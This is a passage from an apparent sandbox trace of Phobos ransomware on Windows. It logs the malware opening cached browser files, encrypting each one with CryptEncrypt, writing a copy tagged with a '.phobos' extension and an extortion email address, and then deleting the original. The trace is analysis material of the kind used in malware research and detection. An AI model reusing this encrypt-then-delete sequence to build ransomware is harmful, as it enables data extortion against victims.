Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.591] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8223) returned 1 [0179.591] CloseHandle (hObject=0x134) returned 1 [0179.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg")) returned 0x2020 [0179.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.592] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.592] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0179.593] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.593] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x201f, lpOverlapped=0x0) returned 1 [0179.646] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2020, dwBufLen=0x2020 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2020) returned 1 [0179.646] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2020, lpOverlapped=0x0) returned 1 [0180.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0180.050] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.051] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.051] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.051] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.051] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.051] CloseHandle (hObject=0x134) returned 1 [0180.051] CloseHandle (hObject=0x194) returned 1 [0180.051] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg")) returned 1 [0180.052] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.075] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2806) returned 1 [0180.075] CloseHandle (hObject=0x180) returned 1 [0180.075] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm")) returned 0x2020 [0180.075] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.075] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.075] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.076] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0180.076] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.076] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaf6, lpOverlapped=0x0) returned 1 [0180.094] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb00, dwBufLen=0xb00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb00) returned 1 [0180.094] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb00, lpOverlapped=0x0) returned 1 [0180.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0180.095] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.095] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.095] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.095] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.096] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.096] CloseHandle (hObject=0x180) returned 1 [0180.096] CloseHandle (hObject=0x154) returned 1 [0180.096] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm")) returned 1 [0180.097] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.099] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=168777) returned 1 [0180.099] CloseHandle (hObject=0x154) returned 1 [0180.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css")) returned 0x2020 [0180.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.099] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.099] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.100] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0180.100] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.100] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x29349, lpOverlapped=0x0) returned 1 [0180.140] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29350, dwBufLen=0x29350 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29350) returned 1 [0180.151] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x29350, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x29350, lpOverlapped=0x0) returned 1 [0180.154] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0180.154] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.154] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.154] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.154] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.154] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.154] CloseHandle (hObject=0x154) returned 1 [0180.154] CloseHandle (hObject=0x180) returned 1 [0180.154] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css")) returned 1 [0180.156] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.160] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=63733) returned 1 [0180.160] CloseHandle (hObject=0x154) returned 1 [0180.160] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm")) returned 0x2020 [0180.160] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.162] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.162] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0180.163] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.163] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf8f5, lpOverlapped=0x0) returned 1 [0180.165] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf900, dwBufLen=0xf900 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf900) returned 1 [0180.165] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf900, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf900, lpOverlapped=0x0) returned 1 [0180.167] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0180.167] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.167] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0180.167] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.167] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0180.167] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.167] CloseHandle (hObject=0x154) returned 1 [0180.167] CloseHandle (hObject=0x194) returned 1 [0180.167] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm")) returned 1 [0180.169] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.175] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13518) returned 1 [0180.175] CloseHandle (hObject=0x134) returned 1 [0180.175] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt")) returned 0x2020 [0180.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.176] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.176] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.177] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0180.177] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.177] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x34ce, lpOverlapped=0x0) returned 1 [0180.200] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x34d0, dwBufLen=0x34d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x34d0) returned 1 [0180.200] WriteFile (in: hFile=0xb8, 